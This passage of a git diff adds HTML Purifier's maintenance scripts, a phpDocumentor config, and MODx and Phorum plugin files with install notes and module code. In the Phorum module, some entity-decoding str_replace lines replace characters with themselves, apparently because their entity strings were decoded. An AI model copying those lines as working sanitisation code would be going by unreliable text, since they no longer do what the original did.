preg_replace('/^(.*?)[ \t]+(\r?)$/m', '\1\2', $contents, -1, $count); + if (!$count) continue; + echo "$file\n"; + file_put_contents($file, $result); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/rename-config.php b/lib/htmlpurifier/maintenance/rename-config.php new file mode 100644 index 000000000..6e59e2a79 --- /dev/null +++ b/lib/htmlpurifier/maintenance/rename-config.php @@ -0,0 +1,84 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +require_once '../library/HTMLPurifier.auto.php'; +assertCli(); + +/** + * @file + * Renames a configuration directive. This involves renaming the file, + * adding an alias, and then regenerating the cache. You still have to + * manually go through and fix any calls to the directive. + * @warning This script doesn't handle multi-stringhash files. + */ + +$argv = $_SERVER['argv']; +if (count($argv) < 3) { + echo "Usage: {$argv[0]} OldName NewName\n"; + exit(1); +} + +chdir('../library/HTMLPurifier/ConfigSchema/schema'); + +$old = $argv[1]; +$new = $argv[2]; + +if (!file_exists("$old.txt")) { + echo "Cannot move undefined configuration directive $old\n"; + exit(1); +} + +if ($old === $new) { + echo "Attempting to move to self, aborting\n"; + exit(1); +} + +if (file_exists("$new.txt")) { + echo "Cannot move to already defined directive $new\n"; + exit(1); +} + +$file = "$old.txt"; +$builder = new HTMLPurifier_ConfigSchema_InterchangeBuilder(); +$interchange = new HTMLPurifier_ConfigSchema_Interchange(); +$builder->buildFile($interchange, $file); +$contents = file_get_contents($file); + +if (strpos($contents, "\r\n") !== false) { + $nl = "\r\n"; +} elseif (strpos($contents, "\r") !== false) { + $nl = "\r"; +} else { + $nl = "\n"; +} + +// replace name with new name +$contents = str_replace($old, $new, $contents); + +if ($interchange->directives[$old]->aliases) { + $pos_alias = strpos($contents, 'ALIASES:'); + $pos_ins = strpos($contents, $nl, $pos_alias); + if ($pos_ins === false) $pos_ins = strlen($contents); + $contents = + substr($contents, 0, $pos_ins) . ", $old" . substr($contents, $pos_ins); + file_put_contents($file, $contents); +} else { + $lines = explode($nl, $contents); + $insert = false; + foreach ($lines as $n => $line) { + if (strncmp($line, '--', 2) === 0) { + $insert = $n; + break; + } + } + if (!$insert) { + $lines[] = "ALIASES: $old"; + } else { + array_splice($lines, $insert, 0, "ALIASES: $old"); + } + file_put_contents($file, implode($nl, $lines)); +} + +rename("$old.txt", "$new.txt") || exit(1); diff --git a/lib/htmlpurifier/maintenance/update-config.php b/lib/htmlpurifier/maintenance/update-config.php new file mode 100644 index 000000000..2d8a7a9c1 --- /dev/null +++ b/lib/htmlpurifier/maintenance/update-config.php @@ -0,0 +1,34 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Converts all instances of $config->set and $config->get to the new + * format, as described by docs/dev-config-bcbreaks.txt + */ + +$FS = new FSTools(); +chdir(dirname(__FILE__) . '/..'); +$raw_files = $FS->globr('.', '*.php'); +foreach ($raw_files as $file) { + $file = substr($file, 2); // rm leading './' + if (strpos($file, 'library/standalone/') === 0) continue; + if (strpos($file, 'maintenance/update-config.php') === 0) continue; + if (strpos($file, 'test-settings.php') === 0) continue; + if (substr_count($file, '.') > 1) continue; // rm meta files + // process the file + $contents = file_get_contents($file); + $contents = preg_replace( + "#config->(set|get)\('(.+?)', '(.+?)'#", + "config->\\1('\\2.\\3'", + $contents + ); + if ($contents === '') continue; + file_put_contents($file, $contents); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/update-freshmeat.php b/lib/htmlpurifier/maintenance/update-freshmeat.php new file mode 100644 index 000000000..5295c0430 --- /dev/null +++ b/lib/htmlpurifier/maintenance/update-freshmeat.php @@ -0,0 +1,156 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Updates Freshmeat's HTML Purifier with the latest information via XML RPC. + */ + +class XmlRpc_Freshmeat +{ + + const URL = 'http://freshmeat.net/xmlrpc/'; + + public $chatty = false; + + public $encodeOptions = array( + 'encoding' => 'utf-8', + ); + + /** + * This array defines shortcut method signatures for dealing with simple + * XML RPC methods. More complex ones (publish_release) should use the named parameter + * syntax. + */ + public $signatures = array( + 'login' => array('username', 'password'), + 'fetch_branch_list' => array('project_name'), + 'fetch_release' => array('project_name', 'branch_name', 'version'), + 'withdraw_release' => array('project_name', 'branch_name', 'version'), + ); + + protected $sid = null; + + /** + * @param $username Username to login with + * @param $password Password to login with + */ + public function __construct($username = null, $password = null) { + if ($username && $password) { + $this->login($username, $password); + } + } + + /** + * Performs a raw XML RPC call to self::URL + */ + protected function call($method, $params) { + $request = xmlrpc_encode_request($method, $params, $this->encodeOptions); + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, self::URL); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_TIMEOUT, 1); + curl_setopt($ch, CURLOPT_HTTPHEADER, array( + 'Content-type: text/xml', + 'Content-length: ' . strlen($request) + )); + curl_setopt($ch, CURLOPT_POSTFIELDS, $request); + $data = curl_exec($ch); + if ($errno = curl_errno($ch)) { + throw new Exception("Curl error [$errno]: " . curl_error($ch)); + } else { + curl_close($ch); + return xmlrpc_decode($data); + } + } + + /** + * Performs an XML RPC call to Freshmeat. + * @param $name Name of method to call, can be methodName or method_name + * @param $args Arguments of call, in form array('key1', 'val1', 'key2' ...) + */ + public function __call($name, $args) { + $method = $this->camelToUnderscore($name); + $params = array(); + if ($this->sid) $params['SID'] = $this->sid; + if (isset($this->signatures[$method])) { + for ($i = 0, $c = count($this->signatures[$method]); $i < $c; $i++) { + $params[$this->signatures[$method][$i]] = $args[$i]; + } + } else { + for ($i = 0, $c = count($args); $i + 1 < $c; $i += 2) { + $params[$args[$i]] = $args[$i + 1]; + } + } + $result = $this->call($method, $params); + switch ($method) { + case 'login': + $this->sid = $result['SID']; + break; + case 'logout': + $this->sid = null; + break; + } + if ($this->chatty) print_r($result); + return $result; + } + + /** + * Munge methodName to method_name + */ + private function camelToUnderscore($name) { + $method = ''; + for ($i = 0, $c = strlen($name); $i < $c; $i++) { + $v = $name[$i]; + if (ctype_lower($v)) $method .= $v; + else $method .= '_' . strtolower($v); + } + return $method; + } + + /** + * Automatically logout at end of scope + */ + public function __destruct() { + if ($this->sid) $this->logout(); + } + +} + +$rpc = new XmlRpc_Freshmeat($argv[1], $argv[2]); +$rpc->chatty = true; + +$project = 'htmlpurifier'; +$branch = 'Default'; +$version = file_get_contents('../VERSION'); + +$result = $rpc->fetchRelease($project, $branch, $version); +if (!isset($result['faultCode'])) { + echo "Freshmeat release already exists.\n"; + exit(0); +} + +$changes = strtr(file_get_contents('../WHATSNEW'), array("\r" => '', "\n" => ' ')); +$focus = (int) trim(file_get_contents('../FOCUS')); + +if (strlen($changes) > 600) { + echo "WHATSNEW entry is too long.\n"; + exit(1); +} + +$rpc->publishRelease( + 'project_name', $project, + 'branch_name', $branch, + 'version', $version, + 'changes', $changes, + 'release_focus', $focus, + 'url_tgz', "http://htmlpurifier.org/releases/htmlpurifier-$version.tar.gz", + 'url_zip', "http://htmlpurifier.org/releases/htmlpurifier-$version.zip", + 'url_changelog', "http://htmlpurifier.org/svnroot/htmlpurifier/tags/$version/NEWS" +); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/phpdoc.ini b/lib/htmlpurifier/phpdoc.ini new file mode 100644 index 000000000..c4c372353 --- /dev/null +++ b/lib/htmlpurifier/phpdoc.ini @@ -0,0 +1,102 @@ +;; phpDocumentor parse configuration file +;; +;; This file is designed to cut down on repetitive typing on the command-line or web interface +;; You can copy this file to create a number of configuration files that can be used with the +;; command-line switch -c, as in phpdoc -c default.ini or phpdoc -c myini.ini. The web +;; interface will automatically generate a list of .ini files that can be used. +;; +;; default.ini is used to generate the online manual at http://www.phpdoc.org/docs +;; +;; ALL .ini files must be in the user subdirectory of phpDocumentor with an extension of .ini +;; +;; Copyright 2002, Greg Beaver <cellog@users.sourceforge.net> +;; +;; WARNING: do not change the name of any command-line parameters, phpDocumentor will ignore them + +[Parse Data] +;; title of all the documentation +;; legal values: any string +title = HTML Purifier API Documentation + +;; parse files that start with a . like .bash_profile +;; legal values: true, false +hidden = false + +;; show elements marked @access private in documentation by setting this to on +;; legal values: on, off +parseprivate = off + +;; parse with javadoc-like description (first sentence is always the short description) +;; legal values: on, off +javadocdesc = on + +;; add any custom @tags separated by commas here +;; legal values: any legal tagname separated by commas. +;customtags = mytag1,mytag2 + +;; This is only used by the XML:DocBook/peardoc2 converter +defaultcategoryname = Documentation + +;; what is the main package? +;; legal values: alphanumeric string plus - and _ +defaultpackagename = HTMLPurifier + +;; output any parsing information? set to on for cron jobs +;; legal values: on +;quiet = on + +;; parse a PEAR-style repository. Do not turn this on if your project does +;; not have a parent directory named "pear" +;; legal values: on/off +;pear = on + +;; where should the documentation be written? +;; legal values: a legal path +target = docs/phpdoc + +;; Which files should be parsed out as special documentation files, such as README, +;; INSTALL and CHANGELOG? This overrides the default files found in +;; phpDocumentor.ini (this file is not a user .ini file, but the global file) +readmeinstallchangelog = README, INSTALL, NEWS, WYSIWYG, SLOW, LICENSE, CREDITS + +;; limit output to the specified packages, even if others are parsed +;; legal values: package names separated by commas +;packageoutput = package1,package2 + +;; comma-separated list of files to parse +;; legal values: paths separated by commas +;filename = /path/to/file1,/path/to/file2,fileincurrentdirectory + +;; comma-separated list of directories to parse +;; legal values: directory paths separated by commas +;directory = /path1,/path2,.,..,subdirectory +;directory = /home/jeichorn/cvs/pear +directory = . + +;; template base directory (the equivalent directory of <installdir>/phpDocumentor) +;templatebase = /path/to/my/templates + +;; directory to find any example files in through @example and {@example} tags +;examplesdir = /path/to/my/templates + +;; comma-separated list of files, directories or wildcards ? and * (any wildcard) to ignore +;; legal values: any wildcard strings separated by commas +;ignore = /path/to/ignore*,*list.php,myfile.php,subdirectory/ +ignore = *tests*,*benchmarks*,*docs*,*test-settings.php,*configdoc*,*maintenance*,*smoketests*,*standalone*,*.svn*,*conf* + +sourcecode = on + +;; comma-separated list of Converters to use in outputformat:Convertername:templatedirectory format +;; legal values: HTML:frames:default,HTML:frames:l0l33t,HTML:frames:phpdoc.de,HTML:frames:phphtmllib, +;; HTML:frames:earthli, +;; HTML:frames:DOM/default,HTML:frames:DOM/l0l33t,HTML:frames:DOM/phpdoc.de, +;; HTML:frames:DOM/phphtmllib,HTML:frames:DOM/earthli +;; HTML:Smarty:default,HTML:Smarty:PHP,HTML:Smarty:HandS +;; PDF:default:default,CHM:default:default,XML:DocBook/peardoc2:default +output=HTML:frames:default + +;; turn this option on if you want highlighted source code for every file +;; legal values: on/off +sourcecode = on + +; vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/modx.txt b/lib/htmlpurifier/plugins/modx.txt new file mode 100644 index 000000000..0763821b5 --- /dev/null +++ b/lib/htmlpurifier/plugins/modx.txt @@ -0,0 +1,112 @@ + +MODx Plugin + +MODx <http://www.modxcms.com/> is an open source PHP application framework. +I first came across them in my referrer logs when tillda asked if anyone +could implement an HTML Purifier plugin. This forum thread +<http://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted +in the fruition of this plugin that davidm says, "is on top of my favorite +list." HTML Purifier goes great with WYSIWYG editors! + + + +1. Credits + +PaulGregory wrote the overall structure of the code. I added the +slashes hack. + + + +2. Install + +First, you need to place HTML Purifier library somewhere. The code here +assumes that you've placed in MODx's assets/plugins/htmlpurifier (no version +number). + +Log into the manager, and navigate: + +Resources > Manage Resources > Plugins tab > New Plugin + +Type in a name (probably HTML Purifier), and copy paste this code into the +textarea: + +-------------------------------------------------------------------------------- +$e = &$modx->Event; +if ($e->name == 'OnBeforeDocFormSave') { + global $content; + + include_once '../assets/plugins/htmlpurifier/library/HTMLPurifier.auto.php'; + $purifier = new HTMLPurifier(); + + static $magic_quotes = null; + if ($magic_quotes === null) { + // this is an ugly hack because this hook hasn't + // had the backslashes removed yet when magic_quotes_gpc is on, + // but HTMLPurifier must not have the quotes slashed. + $magic_quotes = get_magic_quotes_gpc(); + } + + if ($magic_quotes) $content = stripslashes($content); + $content = $purifier->purify($content); + if ($magic_quotes) $content = addslashes($content); +} +-------------------------------------------------------------------------------- + +Then navigate to the System Events tab and check "OnBeforeDocFormSave". +Save the plugin. HTML Purifier now is integrated! + + + +3. Making sure it works + +You can test HTML Purifier by deliberately putting in crappy HTML and seeing +whether or not it gets fixed. A better way is to put in something like this: + +<p lang="fr">Il est bon</p> + +...and seeing whether or not the content comes out as: + +<p lang="fr" xml:lang="fr">Il est bon</p> + +(lang to xml:lang synchronization is one of the many features HTML Purifier +has). + + + +4. Caveat Emptor + +This code does not intercept save requests from the QuickEdit plugin, this may +be added in a later version. It also modifies things on save, so there's a +slight chance that HTML Purifier may make a boo-boo and accidently mess things +up (the original version is not saved). + +Finally, make sure that MODx is using UTF-8. If you are using, say, a French +localisation, you may be using Latin-1, if that's the case, configure +HTML Purifier properly like this: + +$config = HTMLPurifier_Config::createDefault(); +$config->set('Core', 'Encoding', 'ISO-8859-1'); // or whatever encoding +$purifier = new HTMLPurifier($config); + + + +5. Known Bugs + +'rn' characters sometimes mysteriously appear after purification. We are +currently investigating this issue. See: <http://htmlpurifier.org/phorum/read.php?3,1866> + + + +6. See Also + +A modified version of Jot 1.1.3 is available, which integrates with HTML +Purifier. You can check it out here: <http://modxcms.com/forums/index.php/topic,25621.msg161970.html> + + +X. Changelog + +2008-06-16 +- Updated code to work with 3.1.0 and later +- Add Known Bugs and See Also section + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/.gitignore b/lib/htmlpurifier/plugins/phorum/.gitignore new file mode 100644 index 000000000..8325e0902 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/.gitignore @@ -0,0 +1,2 @@ +migrate.php +htmlpurifier/* diff --git a/lib/htmlpurifier/plugins/phorum/Changelog b/lib/htmlpurifier/plugins/phorum/Changelog new file mode 100644 index 000000000..9f939e54a --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/Changelog @@ -0,0 +1,27 @@ +Changelog HTMLPurifier : Phorum Mod +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| + += KEY ==================== + # Breaks back-compat + ! Feature + - Bugfix + + Sub-comment + . Internal change +========================== + +Version 4.0.0 for Phorum 5.2, released July 9, 2009 +# Works only with HTML Purifier 4.0.0 +! Better installation documentation +- Fixed double encoded quotes +- Fixed fatal error when migrate.php is blank + +Version 3.0.0 for Phorum 5.2, released January 12, 2008 +# WYSIWYG and suppress_message options are now configurable via web + interface. +- Module now compatible with Phorum 5.2, primary bugs were in migration + code as well as signature and edit message handling. This module is NOT + compatible with Phorum 5.1. +- Buggy WYSIWYG mode refined +. AutoFormatParam added to list of default configuration namespaces + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/INSTALL b/lib/htmlpurifier/plugins/phorum/INSTALL new file mode 100644 index 000000000..23c76fc5c --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/INSTALL @@ -0,0 +1,84 @@ + +Install + How to install the Phorum HTML Purifier plugin + +0. PREREQUISITES +---------------- +This Phorum module only works on PHP5 and with HTML Purifier 4.0.0 +or later. + +1. UNZIP +-------- +Unzip phorum-htmlpurifier-x.y.z, producing an htmlpurifier folder. +You've already done this step if you're reading this! + +2. MOVE +------- +Move the htmlpurifier folder to the mods/ folder of your Phorum +installation, so the directory structure looks like: + +phorum/ + mods/ + htmlpurifier/ + INSTALL - this install file + info.txt, ... - the module files + htmlpurifier/ + +3. INSTALL HTML PURIFIER +------------------------ +Download and unzip HTML Purifier <htmlpurifier.org>. Place the contents of +the library/ folder in the htmlpurifier/htmlpurifier folder. Your directory +structure will look like: + +phorum/ + mods/ + htmlpurifier/ + htmlpurifier/ + HTMLPurifier.auto.php + ... - other files + HTMLPurifier/ + +Advanced users: + If you have HTML Purifier installed elsewhere on your server, + all you need is an HTMLPurifier.auto.php file in the library folder which + includes the HTMLPurifier.auto.php file in your install. + +4. MIGRATE +---------- +If you're setting up a new Phorum installation, all you need to do is create +a blank migrate.php file in the htmlpurifier module folder (NOT the library +folder. + +If you have an old Phorum installation and was using BBCode, +copy migrate.bbcode.php to migrate.php. If you were using a different input +format, follow the instructions in migrate.bbcode.php to create your own custom +migrate.php file. + +Your directory structure should now look like this: + +phorum/ + mods/ + htmlpurifier/ + migrate.php + +5. ENABLE +--------- +Navigate to your Phorum admin panel at http://example.com/phorum/admin.php, +click on Global Settings > Modules, scroll to "HTML Purifier Phorum Mod" and +turn it On. + +6. MIGRATE SIGNATURES +--------------------- +If you're setting up a new Phorum installation, skip this step. + +If you allowed your users to make signatures, navigate to the module settings +page of HTML Purifier (Global Settings > Modules > HTML Purifier Phorum Mod > +Configure), type in "yes" in the "Confirm" box, and press "Migrate." + +ONLY DO THIS ONCE! BE SURE TO BACK UP YOUR DATABASE! + +7. CONFIGURE +------------ +Configure using Edit settings. See that page for more information. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/README b/lib/htmlpurifier/plugins/phorum/README new file mode 100644 index 000000000..0524ed39d --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/README @@ -0,0 +1,45 @@ + +HTML Purifier Phorum Mod - Filter your HTML the Standards-Compliant Way! + +This Phorum mod enables HTML posting on Phorum. Under normal circumstances, +this would cause a huge security risk, but because we are running +HTML through HTML Purifier, output is guaranteed to be XSS free and +standards-compliant. + +This mod requires HTML input, and previous markup languages need to be +converted accordingly. Thus, it is vital that you create a 'migrate.php' +file that works with your installation. If you're using the built-in +BBCode formatting, simply move migrate.bbcode.php to that place; for +other markup languages, consult said file for instructions on how +to adapt it to your needs. + + -- NOTE ------------------------------------------------- + You can also run this module in parallel with another + formatting module; this module attempts to place itself + at the end of the filtering chain. However, if any + previous modules produce insecure HTML (for instance, + a JavaScript email obfuscator) they will get cleaned. + +This module will not work if 'migrate.php' is not created, and an improperly +made migration file may *CORRUPT* Phorum, so please take your time to +do this correctly. It should go without saying to *BACKUP YOUR DATABASE* +before attempting anything here. If no migration is necessary, you can +simply create a blank migrate.php file. HTML Purifier is smart and will +not re-migrate already processed messages. However, the original code +is irretrievably lost (we may change this in the future.) + +This module will not automatically migrate user signatures, because this +process may take a long time. After installing the HTML Purifier module and +then configuring 'migrate.php', navigate to Settings and click 'Migrate +Signatures' to migrate all user signatures to HTML. + +All of HTML Purifier's usual functions are configurable via the mod settings +page. If you require custom configuration, create config.php file in +the mod directory that edits a $config variable. Be sure, also, to +set $PHORUM['mod_htmlpurifier']['wysiwyg'] to TRUE if you are using a +WYSIWYG editor (you can do this through a common hook or the web +configuration form). + +Visit HTML Purifier at <http://htmlpurifier.org/>. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/config.default.php b/lib/htmlpurifier/plugins/phorum/config.default.php new file mode 100644 index 000000000..e047c0b42 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/config.default.php @@ -0,0 +1,57 @@ +<?php + +if(!defined("PHORUM")) exit; + +// default HTML Purifier configuration settings +$config->set('HTML.Allowed', + // alphabetically sorted +'a[href|title] +abbr[title] +acronym[title] +b +blockquote[cite] +br +caption +cite +code +dd +del +dfn +div +dl +dt +em +i +img[src|alt|title|class] +ins +kbd +li +ol +p +pre +s +strike +strong +sub +sup +table +tbody +td +tfoot +th +thead +tr +tt +u +ul +var'); +$config->set('AutoFormat.AutoParagraph', true); +$config->set('AutoFormat.Linkify', true); +$config->set('HTML.Doctype', 'XHTML 1.0 Transitional'); +$config->set('Core.AggressivelyFixLt', true); +$config->set('Core.Encoding', $GLOBALS['PHORUM']['DATA']['CHARSET']); // we'll change this eventually +if (strtolower($GLOBALS['PHORUM']['DATA']['CHARSET']) !== 'utf-8') { + $config->set('Core.EscapeNonASCIICharacters', true); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/htmlpurifier.php b/lib/htmlpurifier/plugins/phorum/htmlpurifier.php new file mode 100644 index 000000000..6f74fc8c9 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/htmlpurifier.php @@ -0,0 +1,309 @@ +<?php + +/** + * HTML Purifier Phorum Mod. Filter your HTML the Standards-Compliant Way! + * + * This Phorum mod enables users to post raw HTML into Phorum. But never + * fear: with the help of HTML Purifier, this HTML will be beat into + * de-XSSed and standards-compliant form, safe for general consumption. + * It is not recommended, but possible to run this mod in parallel + * with other formatters (in short, please DISABLE the BBcode mod). + * + * For help migrating from your previous markup language to pure HTML + * please check the migrate.bbcode.php file. + * + * If you'd like to use this with a WYSIWYG editor, make sure that + * editor sets $PHORUM['mod_htmlpurifier']['wysiwyg'] to true. Otherwise, + * administrators who need to edit other people's comments may be at + * risk for some nasty attacks. + * + * Tested with Phorum 5.2.11. + */ + +// Note: Cache data is base64 encoded because Phorum insists on flinging +// to the user and expecting it to come back unharmed, newlines and +// all, which ain't happening. It's slower, it takes up more space, but +// at least it won't get mutilated + +/** + * Purifies a data array + */ +function phorum_htmlpurifier_format($data) +{ + $PHORUM = $GLOBALS["PHORUM"]; + + $purifier =& HTMLPurifier::getInstance(); + $cache_serial = $PHORUM['mod_htmlpurifier']['body_cache_serial']; + + foreach($data as $message_id => $message){ + if(isset($message['body'])) { + + if ($message_id) { + // we're dealing with a real message, not a fake, so + // there a number of shortcuts that can be taken + + if (isset($message['meta']['htmlpurifier_light'])) { + // format hook was called outside of Phorum's normal + // functions, do the abridged purification + $data[$message_id]['body'] = $purifier->purify($message['body']); + continue; + } + + if (!empty($PHORUM['args']['purge'])) { + // purge the cache, must be below the following if + unset($message['meta']['body_cache']); + } + + if ( + isset($message['meta']['body_cache']) && + isset($message['meta']['body_cache_serial']) && + $message['meta']['body_cache_serial'] == $cache_serial + ) { + // cached version is present, bail out early + $data[$message_id]['body'] = base64_decode($message['meta']['body_cache']); + continue; + } + } + + // migration might edit this array, that's why it's defined + // so early + $updated_message = array(); + + // create the $body variable + if ( + $message_id && // message must be real to migrate + !isset($message['meta']['body_cache_serial']) + ) { + // perform migration + $fake_data = array(); + list($signature, $edit_message) = phorum_htmlpurifier_remove_sig_and_editmessage($message); + $fake_data[$message_id] = $message; + $fake_data = phorum_htmlpurifier_migrate($fake_data); + $body = $fake_data[$message_id]['body']; + $body = str_replace("<phorum break>\n", "\n", $body); + $updated_message['body'] = $body; // save it in + $body .= $signature . $edit_message; // add it back in + } else { + // reverse Phorum's pre-processing + $body = $message['body']; + // order is important + $body = str_replace("<phorum break>\n", "\n", $body); + $body = str_replace(array('<','>','&', '"'), array('<','>','&','"'), $body); + if (!$message_id && defined('PHORUM_CONTROL_CENTER')) { + // we're in control.php, so it was double-escaped + $body = str_replace(array('<','>','&', '"'), array('<','>','&','"'), $body); + } + } + + $body = $purifier->purify($body); + + // dynamically update the cache (MUST BE DONE HERE!) + // this is inefficient because it's one db call per + // cache miss, but once the cache is in place things are + // a lot zippier. + + if ($message_id) { // make sure it's not a fake id + $updated_message['meta'] = $message['meta']; + $updated_message['meta']['body_cache'] = base64_encode($body); + $updated_message['meta']['body_cache_serial'] = $cache_serial; + phorum_db_update_message($message_id, $updated_message); + } + + // must not get overloaded until after we cache it, otherwise + // we'll inadvertently change the original text + $data[$message_id]['body'] = $body; + + } + } + + return $data; +} + +// ----------------------------------------------------------------------- +// This is fragile code, copied from read.php:596 (Phorum 5.2.6). Please +// keep this code in-sync with Phorum + +/** + * Generates a signature based on a message array + */ +function phorum_htmlpurifier_generate_sig($row) { + $phorum_sig = ''; + if(isset($row["user"]["signature"]) + && isset($row['meta']['show_signature']) && $row['meta']['show_signature']==1){ + $phorum_sig=trim($row["user"]["signature"]); + if(!empty($phorum_sig)){ + $phorum_sig="\n\n$phorum_sig"; + } + } + return $phorum_sig; +} + +/** + * Generates an edit message based on a message array + */ +function phorum_htmlpurifier_generate_editmessage($row) { + $PHORUM = $GLOBALS['PHORUM']; + $editmessage = ''; + if(isset($row['meta']['edit_count']) && $row['meta']['edit_count'] > 0) { + $editmessage = str_replace ("%count%", $row['meta']['edit_count'], $PHORUM["DATA"]["LANG"]["EditedMessage"]); + $editmessage = str_replace ("%lastedit%", phorum_date($PHORUM["short_date_time"],$row['meta']['edit_date']), $editmessage); + $editmessage = str_replace ("%lastuser%", $row['meta']['edit_username'], $editmessage); + $editmessage = "\n\n\n\n$editmessage"; + } + return $editmessage; +} + +// End fragile code +// ----------------------------------------------------------------------- + +/** + * Removes the signature and edit message from a message + * @param $row Message passed by reference + */ +function phorum_htmlpurifier_remove_sig_and_editmessage(&$row) { + $signature = phorum_htmlpurifier_generate_sig($row); + $editmessage = phorum_htmlpurifier_generate_editmessage($row); + $replacements = array(); + // we need to remove add <phorum break> as that is the form these + // extra bits are in. + if ($signature) $replacements[str_replace("\n", "<phorum break>\n", $signature)] = ''; + if ($editmessage) $replacements[str_replace("\n", "<phorum break>\n", $editmessage)] = ''; + $row['body'] = strtr($row['body'], $replacements); + return array($signature, $editmessage); +} + +/** + * Indicate that data is fully HTML and not from migration, invalidate + * previous caches + * @note This function could generate the actual cache entries, but + * since there's data missing that must be deferred to the first read + */ +function phorum_htmlpurifier_posting($message) { + $PHORUM = $GLOBALS["PHORUM"]; + unset($message['meta']['body_cache']); // invalidate the cache + $message['meta']['body_cache_serial'] = $PHORUM['mod_htmlpurifier']['body_cache_serial']; + return $message; +} + +/** + * Overload quoting mechanism to prevent default, mail-style quote from happening + */ +function phorum_htmlpurifier_quote($array) { + $PHORUM = $GLOBALS["PHORUM"]; + $purifier =& HTMLPurifier::getInstance(); + $text = $purifier->purify($array[1]); + $source = htmlspecialchars($array[0]); + return "<blockquote cite=\"$source\">\n$text\n</blockquote>"; +} + +/** + * Ensure that our format hook is processed last. Also, loads the library. + * @credits <http://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt> + */ +function phorum_htmlpurifier_common() { + + require_once(dirname(__FILE__).'/htmlpurifier/HTMLPurifier.auto.php'); + require(dirname(__FILE__).'/init-config.php'); + + $config = phorum_htmlpurifier_get_config(); + HTMLPurifier::getInstance($config); + + // increment revision.txt if you want to invalidate the cache + $GLOBALS['PHORUM']['mod_htmlpurifier']['body_cache_serial'] = $config->getSerial(); + + // load migration + if (file_exists(dirname(__FILE__) . '/migrate.php')) { + include(dirname(__FILE__) . '/migrate.php'); + } else { + echo '<strong>Error:</strong> No migration path specified for HTML Purifier, please check + <tt>modes/htmlpurifier/migrate.bbcode.php</tt> for instructions on + how to migrate from your previous markup language.'; + exit; + } + + if (!function_exists('phorum_htmlpurifier_migrate')) { + // Dummy function + function phorum_htmlpurifier_migrate($data) {return $data;} + } + +} + +/** + * Pre-emptively performs purification if it looks like a WYSIWYG editor + * is being used + */ +function phorum_htmlpurifier_before_editor($message) { + if (!empty($GLOBALS['PHORUM']['mod_htmlpurifier']['wysiwyg'])) { + if (!empty($message['body'])) { + $body = $message['body']; + // de-entity-ize contents + $body = str_replace(array('<','>','&'), array('<','>','&'), $body); + $purifier =& HTMLPurifier::getInstance(); + $body = $purifier->purify($body); + // re-entity-ize contents + $body = htmlspecialchars($body, ENT_QUOTES, $GLOBALS['PHORUM']['DATA']['CHARSET']); + $message['body'] = $body; + } + } + return $message; +} + +function phorum_htmlpurifier_editor_after_subject() { + // don't show this message if it's a WYSIWYG editor, since it will + // then be handled automatically + if (!empty($GLOBALS['PHORUM']['mod_htmlpurifier']['wysiwyg'])) { + $i = $GLOBALS['PHORUM']['DATA']['MODE']; + if ($i == 'quote' || $i == 'edit' || $i == 'moderation') { + ?> + <div> + <p> + <strong>Notice:</strong> HTML has been scrubbed for your safety. + If you would like to see the original, turn off WYSIWYG mode + (consult your administrator for details.) + </p> + </div> + <?php + } + return; + } + if (!empty($GLOBALS['PHORUM']['mod_htmlpurifier']['suppress_message'])) return; + ?><div class="htmlpurifier-help"> + <p> + <strong>HTML input</strong> is enabled. Make sure you escape all HTML and + angled brackets with <code>&lt;</code> and <code>&gt;</code>. + </p><?php + $purifier =& HTMLPurifier::getInstance(); + $config = $purifier->config; + if ($config->get('AutoFormat.AutoParagraph')) { + ?><p> + <strong>Auto-paragraphing</strong> is enabled. Double + newlines will be converted to paragraphs; for single + newlines, use the <code>pre</code> tag. + </p><?php + } + $html_definition = $config->getDefinition('HTML'); + $allowed = array(); + foreach ($html_definition->info as $name => $x) $allowed[] = "<code>$name</code>"; + sort($allowed); + $allowed_text = implode(', ', $allowed); + ?><p><strong>Allowed tags:</strong> <?php + echo $allowed_text; + ?>.</p><?php + ?> + </p> + <p> + For inputting literal code such as HTML and PHP for display, use + CDATA tags to auto-escape your angled brackets, and <code>pre</code> + to preserve newlines: + </p> + <pre><pre><![CDATA[ +<em>Place code here</em> +]]></pre></pre> + <p> + Power users, you can hide this notice with: + <pre>.htmlpurifier-help {display:none;}</pre> + </p> + </div><?php +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/plugins/phorum/info.txt b/lib/htmlpurifier/plugins/phorum/info.txt new file mode 100644 index 000000000..723465490 --- /dev/null +++ b/lib/htmlpurifier/plugins/phorum/info.txt @@ -0,0 +1,18 @@ +title: HTML Purifier Phorum Mod +desc: This module enables standards-compliant HTML filtering on Phorum. Please check migrate.bbcode.php before enabling this mod. +author: Edward Z. Yang +url: http://htmlpurifier.org/ +version: 4.0.0 + +hook: format|phorum_htmlpurifier_format +hook: quote|phorum_htmlpurifier_quote +hook: posting_custom_action|phorum_htmlpurifier_posting +hook: common|phorum_htmlpurifier_common +hook: before_editor|phorum_htmlpurifier_before_editor +hook: tpl_editor_after_subject|phorum_htmlpurifier_editor_after_subject + +# This module is meant to be a drop-in for bbcode, so 